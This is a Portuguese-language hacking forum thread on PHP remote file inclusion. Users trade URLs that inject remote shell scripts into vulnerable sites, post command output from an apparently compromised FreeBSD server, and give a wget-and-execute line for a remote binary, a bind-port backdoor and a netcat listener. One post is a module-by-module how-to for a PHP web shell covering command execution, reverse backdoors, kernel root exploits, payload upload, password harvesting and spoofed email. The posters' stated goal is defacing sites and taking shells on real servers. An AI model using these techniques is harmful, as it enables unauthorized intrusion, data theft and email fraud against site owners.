PHP Injection - O Fim das Dúvidas

[Dragonz]

aee
to quase conseguindo

seguinte:

eu procuro um site no google q tenha /index.php

ae eu boto

http://www.site.com.br/index.php?http:/ ... if?&cmd=ls


mais qdo eu faco isso a pagina atualiza mais nao muda nada....

como eu vo saber se to fazendo certo?

[Quicky]

karalho.. tu tí longe velho..
precisaa ter uma string!!!!!! meu deus... precisa ser algo do tipo:

http://www.site.com.br/index.php?exibir_a_pagina=

aà tu poe dpois..

e dsoul.. se possàvel.. me arranja aà o scan de php q tu tem.. to precisando urgente..

[rog]

Dragonz

vc nao esta querendo virar lammerz tambem né ?

o que vai fazer si conseguir invadir ?

[Vader]

http://www.xxxxxx.co.kr

xxxxxxt@lh2$ uname -a;id;uptime

FreeBSD lh2.nisko.net 5.0-RELEASE FreeBSD 5.0-RELEASE #1: Wed Oct 5 10:23:24 KST 2005 root@lh2.nisko.net:/usr/obj/usr/src/sys/LW2KERNEL i386
uid=1245(xxxxxx) gid=1245(xxxxxx) groups=1245(xxxxxx)
11:36AM up 28 days, 16:11, 1 user, load averages: 0.08, 0.02, 0.01


weeeeeeeeeeeeeeeeeeeeeeeeeee \o//

[sthealt]

Bom post

Olha só, este servidor veio preparado: http://www.phpcoin.com/auxpage.php?page ... xt?&cmd=ls

[juniao]

só tenho uma duvida.. qdo aparece isso.. é que tah vuneravel??

--------------------------------------------------------------------------
Warning: main(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/marques/public_html/pagina.php on line 9

Warning: main(http://www.hackexpert.net/xpl/cmd.gif?): failed to open stream: Permission denied in /home/marques/public_html/pagina.php on line 9

Warning: main(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/marques/public_html/pagina.php on line 9

Warning: main(http://www.hackexpert.net/xpl/cmd.gif?): failed to open stream: Permission denied in /home/marques/public_html/pagina.php on line 9

Warning: main(): Failed opening 'http://www.hackexpert.net/xpl/cmd.gif?' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/marques/public_html/pagina.php on line 9
------------------------------------------------------------------------------

?

[Bruno Candido]

não é juniao, o próprio site não tem permissão pra adicionar píginas externas dentro dele :lol:
proteção do hosting talvez ^^

@Quicky.. eu to usando sempre crond agora.. ele roda na porta 666666, fiz uma 'auto-cmd', ela coloca o crond sozinha: http://hackexpert.net/xpl/bind.gif?
se aparecer assim: "backdoor do outlaw group executada com sucesso, pid = 31223" é só entrar por telnet ^^


p.s.: o host do hackexpert caiu.. vou fazer outro depois

[filipevr]

Primeiramente eu tenho que dizer que o seu tuto esta 10 mesmo assim estou com algumas dificuldades ja consegui encontrar o site vulneravel só que nao estou conseguindo rotar a shel olha só >

http://www.site.com.br/pagina.php?pagin ... .gif?&cmd= cd /tmp;wget http://www.geocities.yahoo.com.br/cmdsh ... in;./r0nin

[sthealt]

Bug do PHP Machine
finte: http://www.xerecoteco.cjb.net
Este How-To vai mostrar como defacers alteram as píginas principais de sites que rodam o php em seu sistemas, siga os passos abaixo que não tem erro, bom e como sempre tudo para fins educacionais,

Modulo: CMD

Serve para: Executa comandos no servidor diretamente pela URL.
Exemplo: http://www.sitebugado.com/index.php?cor ... if?&cmd=ls -al
Explicaçao: Entao usando esses exemplo acima, seria executado o comando ls -al no servidor, pode-se usar diversor
comandos numa unica linha, sendo seprados por ;(ponto e virgula)
Exemplo:http://www.sitebugado.com/index.php?...se.gif?&cmd=ls -al;uane -a;id

Modulo: SafeMode

Serve para: Faz listagem de arquivos e pastas do servidor usando comandos internos da PHP.
Exemplo:http://www.sitebugado.com/index.php?...if?&safemode=1
Explicaçao: Precisa????????????

Modulo: Visualizar Cod Font(See)

Serve para: Visualizar o codigo fonte dos arquvos no servidor. Na versao 3.3 pra cima basta apernar clicar no
arquivo que o codigo font sera mostrado logo abaixo, mas para isso o modulo Safemode tem que estar habilitado:
Exemplo:http://www.sitebugado.com/index.php?...&see=index.php
Explicaçao: Mostraria o codigo fonte da pígina index.php
Exemplo:http://www.sitebugado.com/index.php?...if?&safemode=1
Explicaçao: basta clicar no link do arquivo para ver seu codigo fonte ou clicar na pasta para mudar o local,
navegação completa pelos links.

Modulo: Shell

Serve para: Escreve um backdoor reverso na pasta /tmp. O arquivo .c deve ser compilado.
Exemplo:http://www.sitebugado.com/index.php?...f?&shell=write
Explicaçao: Cria o arquivo dc-connectback.c na pasta /tmp. Basta compilar e executar. /tmp/dc-coonetback seuip
porta. Para abrir uma porta no seu pc vc precisa'ra do net cat por exemplo, usnaod o comando nc -vv -l -p 666 no
caso a posta 666 seria aberta.


Modulo: Kernel

Serve para: Escreve um xpl na pasta /tmp para conseguir root no sistema.O arquivo .c deve ser compilado
Exemplo:http://www.sitebugado.com/index.php?...?&kernel=write
Explicaçao: O xpl poderí ser para kernel <= a 2.4.18 ou para <= a 2.4.22

Modulo: Upload xpl/backdoor (dx - hostxpl - storage)

Serve para: Com este modulo é simples e facil fazer upload de qualquer arquivo compilado ao nao paras o servidor
Exemplo:http://www.sitebugado.com/index.php?...xpl=http://www
.site.com/xpl&storage=/tmp
Explicaçao: &dx=1 => Define o modulo de upload como ativo
&hostxpl=http://www.site.com/xpl => Url de onde o xpl ou ualquer outro arquivo esteja
&storage=/tmp => local onde o arquivo serí escrito

Modulo: Visualizar codigo cont colorido (sfc)

Serve para: Visualizar codigo cont colorido, ficanod mais facil a detecío de senhas de banco de dados e depois
funçoes da php.
Exemplo:http://www.sitebugado.com/index.php?...fc=arquivo.php

Modulo: Visualiazar informaçoes de arquivo. (fileinfo - filanalize)

Serve para: Precisa explicar???
Exemplo:http://www.sitebugado.com/index.php?...1&fileanalize=
arquivo
Explicaçao: &fileinfo=1 => habilita o modulo de informaçao.
&fileanalize=aquivo => Nome do arquivo a ser analizado.

Modulo: Mail fake

Serve para: putz!!! Server pra manda um fame mail - pode mandar email DE QUEM para quem para quiser. Obs: mesmo
que o servidor esteja em safemode ow qualquer outro tipo de proteçao esse modulo deve funcionar. Se apacer escrito
data cha0s na tela com as informaçoes do sistema, essa funçao ira funcionar na maioria dos casos.
Exemplo:http://www.sitebugado.com/index.php?...se.gif?&fake=1
Explicaçao: Sera mostrado na pígina um formulírio com os devidos campos para postagem do fake mail.

O xpl encontra-se nesse server com o nome de cse.gif
Versao para windows: csewin.gif

by Cr4shyng - irc.brasnet.org #datacha0s

[Dragonz]

Dragonz

vc nao esta querendo virar lammerz tambem né ?

o que vai fazer si conseguir invadir ?

aff se liga...... to querendo aprender..... se vc ja sabe e nao quer ajudar os outros nao precisa fica pagando de bonzao pra quem nao sabe ok?

pq com ctz vc ja fez as msm perguntas q eu to fazendo agora pra alguem ....

oq eu vo faze se invadir?
oq isso tem a ver com vc? q por sinal nao me ajudou uma unica vez sempre q eu pedi....

de boa.... se nao quer ajuda nao atrapalha pq eu to interessado em aprende isso sim...





-----------------------------------------------


oww alguem ajuda?
tpw eu faco a pesquisa no google pra tenta achar um site qualquer mais ta quase impossivel de achar.....
ai me veiu a ideia .....

um forum em php tem isso

por exemplo oforum-invaders

http://www.forum-invaders.com.br/postin ... st&p=69696


se eu tenta executar esse comando por um forum funciona tbm?


a minha intencao nao eh fazer deface eh so ownar uma shell

isso funcionaria em forum? pq site ta mto dificil de achar